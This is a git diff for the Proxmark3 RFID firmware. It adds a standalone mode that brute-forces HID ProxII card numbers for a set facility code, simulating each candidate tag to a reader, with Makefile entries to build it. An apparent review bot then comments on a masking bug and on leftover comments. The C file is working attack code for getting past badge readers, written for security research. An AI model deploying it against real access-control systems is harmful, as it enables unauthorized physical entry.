diff --git a/armsrc/Standalone/Makefile.hal b/armsrc/Standalone/Makefile.hal
index 6b4510da8..3c18e681b 100644
--- a/armsrc/Standalone/Makefile.hal
+++ b/armsrc/Standalone/Makefile.hal
@@ -56,6 +56,9 @@ define KNOWN_STANDALONE_DEFINITIONS
 | LF_PROXBRUTE | HID ProxII bruteforce |
 | | - Brad Antoniewicz |
 +----------------------------------------------------------+
+| LF_PROX2BRUTE | HID ProxII bruteforce v2 |
+| | |
++----------------------------------------------------------+
 | LF_SAMYRUN | HID26 read/clone/sim |
 | (default) | - Samy Kamkar |
 +----------------------------------------------------------+
@@ -118,7 +121,7 @@ define KNOWN_STANDALONE_DEFINITIONS
 +----------------------------------------------------------+
 endef
-STANDALONE_MODES := LF_SKELETON LF_EM4100EMUL LF_EM4100RSWB LF_EM4100RSWW LF_EM4100RWC LF_HIDBRUTE LF_HIDFCBRUTE LF_ICEHID LF_PROXBRUTE LF_SAMYRUN LF_THAREXDE LF_NEXID
+STANDALONE_MODES := LF_SKELETON LF_EM4100EMUL LF_EM4100RSWB LF_EM4100RSWW LF_EM4100RWC LF_HIDBRUTE LF_HIDFCBRUTE LF_ICEHID LF_PROXBRUTE LF_PROX2BRUTE LF_SAMYRUN LF_THAREXDE LF_NEXID
 STANDALONE_MODES += HF_14ASNIFF HF_14BSNIFF HF_15SNIFF HF_AVEFUL HF_BOG HF_COLIN HF_CRAFTBYTE HF_ICECLASS HF_LEGIC HF_LEGICSIM HF_MATTYRUN HF_MFCSIM HF_MSDSAL HF_TCPRST HF_TMUDFORD HF_YOUNG HF_REBLAY DANKARMULTI
 STANDALONE_MODES_REQ_BT := HF_REBLAY
 STANDALONE_MODES_REQ_SMARTCARD :=
diff --git a/armsrc/Standalone/Makefile.inc b/armsrc/Standalone/Makefile.inc
index 05a63f1dd..15218912c 100644
--- a/armsrc/Standalone/Makefile.inc
+++ b/armsrc/Standalone/Makefile.inc
@@ -29,6 +29,10 @@ endif
 ifneq (,$(findstring WITH_STANDALONE_LF_PROXBRUTE,$(APP_CFLAGS)))
 SRC_STANDALONE = lf_proxbrute.c
 endif
+# WITH_STANDALONE_LF_PROX2BRUTE
+ifneq (,$(findstring WITH_STANDALONE_LF_PROX2BRUTE,$(APP_CFLAGS)))
+ SRC_STANDALONE = lf_prox2brute.c
+endif
 # WITH_STANDALONE_LF_HIDBRUTE
 ifneq (,$(findstring WITH_STANDALONE_LF_HIDBRUTE,$(APP_CFLAGS)))
 SRC_STANDALONE = lf_hidbrute.c
diff --git a/armsrc/Standalone/lf_prox2brute.c b/armsrc/Standalone/lf_prox2brute.c
new file mode 100644
index 000000000..0117e91e6
--- /dev/null
+++ b/armsrc/Standalone/lf_prox2brute.c
@@ -0,0 +1,108 @@
+//-----------------------------------------------------------------------------
+// Copyright (C) Brad Antoniewicz 2011
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
+//
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
+//-----------------------------------------------------------------------------
+// LF HID ProxII Brutforce v2 by lnv42 - based on Proxbrute by Brad antoniewicz
+//
+// Following code is a trivial brute forcer for when you know the facility
+// code and want to find valid(s) card number(s). It will try all card
+// fnumbers rom CARDNUM_START to CARDNUM_END one by one (max. ~65k tries).
+// This brute force will be a lot faster than Proxbrute that will try all
+// possibles values for LF low, even those with bad checksum (~4g tries).
+// LEDs will help you know which card number(s) worked.
+//
+//-----------------------------------------------------------------------------
+#include "standalone.h" // standalone definitions
+#include "proxmark3_arm.h"
+#include "appmain.h"
+#include "fpgaloader.h"
+#include "util.h"
+#include "dbprint.h"
+#include "lfops.h"
+#include "parity.h"
+
+#define CARDNUM_START 0
+#define CARDNUM_END 0xFFFF
+#define FACILITY_CODE 2
+
+void ModInfo(void) {
+ DbpString(" LF HID ProxII bruteforce v2");
+}
+
+// samy's sniff and repeat routine for LF
+void RunMod(void) {
+ StandAloneMode();
+ Dbprintf(">> LF HID proxII bruteforce v2 a.k.a Prox2Brute Started <<");
+ FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
+
+ const uint32_t high = 0x20; // LF high value is always 0x20 here
+ uint32_t low = 0;
+
+ uint32_t fac = FACILITY_CODE, cardnum = 0;
+
+ LED_D_ON();
+ while (BUTTON_HELD(200) != BUTTON_HOLD) { // Waiting for a 200ms button press
+ WDT_HIT();
+ // exit from SamyRun, send a usbcommand.
+ if (data_available()) { // early exit
+ DbpString("[=] You can take the shell back :) ...");
+ LEDsoff();
+ return;
+ }
+ }
+
+ LED_C_ON();
+ WAIT_BUTTON_RELEASED(); // We are now ready to start brutforcing card numbers
+ LEDsoff();
+
+ Dbprintf("[=] Starting HID ProxII Bruteforce from card %08x to %08x",
+ CARDNUM_START, MIN(CARDNUM_END, 0xFFFF));
+
+ for (cardnum = CARDNUM_START ; cardnum <= MIN(CARDNUM_END, 0xFFFF) ; cardnum++) {
+ WDT_HIT();
+
+ // exit from SamyRun, send a usbcommand.
+ if (data_available()) break;
+
+ // short button press may be used for fast-forward
+ if (BUTTON_HELD(1000) == BUTTON_HOLD) break; // long button press (>=1sec) exit
+
+ // calculate the new LF low value including Card number, Facility code and checksum
+ low = (cardnum << 1) | (fac << 17);
+ low |= oddparity32((low >> 1) & 0xFFF);
+ low |= evenparity32((low >> 13) & 0xFFF) << 25;
+
+ Dbprintf("[=] trying Facility = %08x, Card = %08x, raw = %08x%08x",
+ fac, cardnum, high, low);
+
+ // Start simulating an HID TAG, with high/low values, no led control and 20000 cycles timeout
+ CmdHIDsimTAGEx(0, high, low, 0, false, 20000);
+
+ // switch leds to be able to know (aproximatly) which card number worked (64 tries loop)
+ LED_A_INV(); // switch led A every try
+ if ((cardnum-CARDNUM_START) % 8 == 7) // switch led B every 8 tries
+ LED_B_INV();
+ if ((cardnum-CARDNUM_START) % 16 == 15) // switch led C every 16 tries
+ LED_C_INV();
+ if ((cardnum-CARDNUM_START) % 32 == 31) // switch led D every 32 tries
+ LED_D_INV();
+ }
+
+ SpinErr((LED_A | LED_B | LED_C | LED_D), 250, 5); // Xmax tree
+ Dbprintf("[=] Ending HID ProxII Bruteforce from card %08x to %08x",
+ CARDNUM_START, cardnum - 1);
+ DbpString("[=] You can take the shell back :) ...");
+ LEDsoff(); // This is the end
+}
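Review bot: `low = (cardnum << 1) | (fac << 17);` places the facility code without masking it, so a FACILITY_CODE edited to anything above 0xFF spills into the even-parity slot at bit 25 and beyond, and the two parity calls that follow then operate on an already corrupted frame while the loop keeps reporting it as a clean try; the card number is bounded by the MIN() in the for-condition, but the facility code is not, so `low = (cardnum << 1) | ((fac & 0xFF) << 17);` (or a compile-time range check on FACILITY_CODE next to the #define) closes that gap. The header comment `// samy's sniff and repeat routine for LF` above RunMod and the two `// exit from SamyRun, send a usbcommand.` comments are leftovers from the mode this file was copied from and describe nothing in this code; replace the first with `// Wait for a 200ms button press, then simulate every card number in [CARDNUM_START, CARDNUM_END] for FACILITY_CODE, breaking on a long press or host data`. The closing `Dbprintf("[=] Ending ...", CARDNUM_START, cardnum - 1)` prints 0xFFFFFFFF when the loop breaks on its very first iteration (CARDNUM_START is 0 and cardnum is uint32_t), so the end card should be clamped or the break case reported separately. Minor: the three `if (...) LED_x_INV();` bodies are unbraced while every other control body in the file is braced, and the header text has typos ("Brutforce", "fnumbers rom", "possibles") worth fixing in the same commit.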